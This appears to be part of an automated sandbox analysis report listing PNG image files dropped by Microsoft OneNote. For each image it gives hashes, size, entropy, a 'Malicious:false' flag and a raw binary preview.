                                                                                                        SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                        MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                        SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                        SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                        SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11332
                                                                                                        Entropy (8bit):7.9324721568775285
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                        MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                        SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                        SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                        SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2270
                                                                                                        Entropy (8bit):7.845368393313232
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                        MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                        SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                        SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                        SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14553
                                                                                                        Entropy (8bit):7.951135681293377
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                        MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                        SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                        SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                        SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11886
                                                                                                        Entropy (8bit):7.946442244439929
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                        MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                        SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                        SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                        SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22634
                                                                                                        Entropy (8bit):7.974332204835705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                        MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                        SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                        SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                        SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13737
                                                                                                        Entropy (8bit):7.916899917415529
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                        MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                        SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                        SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                        SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13241
                                                                                                        Entropy (8bit):7.931391290415517
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                        MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                        SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                        SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                        SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4490
                                                                                                        Entropy (8bit):7.928016176674318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                        MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                        SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                        SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                        SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):17289
                                                                                                        Entropy (8bit):7.962998633267186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                        MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                        SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                        SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                        SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2332
                                                                                                        Entropy (8bit):7.8822150338370776
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                        MD5:91CB7F1273AA003076401081B8A22237
                                                                                                        SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                        SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                        SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16003
                                                                                                        Entropy (8bit):7.959532793770661
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                        MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                        SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                        SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                        SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1924
                                                                                                        Entropy (8bit):7.836744258175623
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                        MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                        SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                        SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                        SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4190
                                                                                                        Entropy (8bit):7.94161730428269
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                        MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                        SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                        SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                        SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                        Malicious:false
